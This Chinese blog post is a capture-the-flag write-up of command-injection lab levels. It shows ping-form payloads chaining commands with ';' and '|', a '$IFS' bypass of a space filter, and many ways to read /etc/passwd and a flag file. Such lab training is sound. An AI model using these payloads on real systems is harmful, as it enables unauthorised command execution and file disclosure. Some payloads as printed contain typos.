博客 / 詳情

返回

test

命令執行漏洞wp

好靶場

top10

命令執行Demo

簡單的查看文件命令,也即 cat 文件

題目告訴你在那個文件夾

故直接查看

image-20251117161014245

cat /tmp/flag.txt

image-20251117161041992

結束

命令執行漏洞體驗

題目提示在 /tmp/flag.txt 所以我們需要優先的想辦法查找這個文件

image-20251118142457114

入口是一個ping 命令,故我們可以 先用ip地址來看看是否有反應

輸入127.0.01 來查看,説明連接成功

我們用連接符號來查詢自己用户權限

用户權限:root

127.0.0.1;whoami

image-20251118142922104

測試成功,接下來用cat 來查看文件

127.0.0.;cat /tmp/flag.txt

image-20251118143438944

結束

命令執行漏洞,我過濾了;符號,你還有其他的辦法嗎

提示你過濾了 ; 那我們使用其他連接符

先看有無成功

輸入 127.2

(當我們沒有提示2,為ip第2 3 位的時候,系統會默認 2 3 位是0 )

image-20251118144544015

查看權限:root

127.2|whoami

image-20251118144726974

查看文件:

127.2|cat /tmp/flag.txt

image-20251118144825599

結束

cat命令執行

直接輸入cat /tmp/flag.txt

image-20251118145102270

image-20251118145120582

tac命令執行

輸入tac /tmp/flag.txt

image-20251118145236375

head命令執行

查看用户權限

head /etc/passwd

image-20251118145812975

查看flag

head /tmp/flag.txt

image-20251118145850861

more命令執行

more /etc/passwd

查看敏感內容

image-20251118150657366

more /tmp/flag.txt

查看flag

image-20251118150814926

less命令執行

Flag在/tmp/flag.txt

less /etc/passwd

查看文件

image-20251118151028887

查看flag

image-20251118151449638

nl命令執行

nl /etc/passwd 發現前面都有了編號

image-20251118152151121

nl /tmp/flag.txt

查看flag

image-20251118152456721

sort命令執行

sort /etc/passwd

發現文件被排序輸出了

image-20251118152823914

sort /tmp/flag.txt 查看flag

image-20251118152902861

uniq命令執行

uniq /etc/passwd 查看文件

將重複的行刪除打印出來

image-20251118154401142

uniq /tmp/flag.txt 查看flag

image-20251118154337214

od命令執行

od -c /etc/passwd 即可查看文件

以ASCII碼的方式指定出來

image-20251118160534455

od -c /tmp/flag.txt 查看flag

image-20251118160607147

到在線的空格去除平台中,將地址偏移量刪除,再提交flag

image-20251118161014531

xxd命令執行

輸入xxd -c -40 /tmp/flag.txt 即可查看到flag

指定為40 個字符在同一行打印出來

image-20251118163018762

hexdump命令執行

hexdump -C /tmp/flag.txt

將地址偏移 16進制 和ASCII碼都能打印出來

image-20251118170840234

base32命令執行

base32 /tmp/flag.txt

將其base32加密後打印

image-20251118174209841

放到在線解密平台即可

image-20251118174308791

base64命令執行

base64 /tmp/flag.txt

將其base64加密後打印

image-20251118174452462

在線平台解碼

image-20251118174737616

strings命令執行

strings /tmp/flag.txt

在這個文件中提取可打印的字符

image-20251118175105749

grep命令執行

grep f /tmp/flag.txt

指定文件查詢指定文本

image-20251118182932396

cp命令執行

cp /tmp/flag.txt /dev/stdout

把這個flag文件 移動到/dev/stdout 的偽文件之中

/dev/stdout 這個偽文件的作用就是將其打印出來

image-20251118192143357

find命令執行

find /tmp -name flag.txt -exec cat {} ;

查看當前的目錄並使用cat命令

image-20251118193520540

mv命令執行

pwd 查看當前界面的使用的

image-20251118210433373

mv /tmp/flag.txt /var/www/html

將其改變到該界面的文件夾中

最後我們在網址訪問即可

image-20251118211203729

運維繫統命令執行

界面發現是一個ping命令 我們點擊其他 的發現不可以,

image-20251118211508212

嘗試輸入正確域名

image-20251118211636744

一直在轉

故在後面使用連接符號嘗試其他的命令

127.0.0.1;cat /tmp/flag.txt

查找到flag

image-20251118211415561

你的空格被我攔截了

題目告訴你空格被攔截,打開後發現是一個ping命令,故我們先用不需要空格的whoami命令,來查看有沒有連接符號被攔截了

發現;被攔截,故用其他的連接符號

127.0.0.1;whoami

image-20251118224616056

127.0.0.1|whoami

發現可行,我們就可以用| 來進行命令連接

image-20251118231239245

我們用變量函數$IFS來進行繞過

127.0.0.1|cat$IFS/tmp/flag.txt

image-20251118232011463

user avatar
0 位用戶收藏了這個故事!

發佈 評論

Some HTML is okay.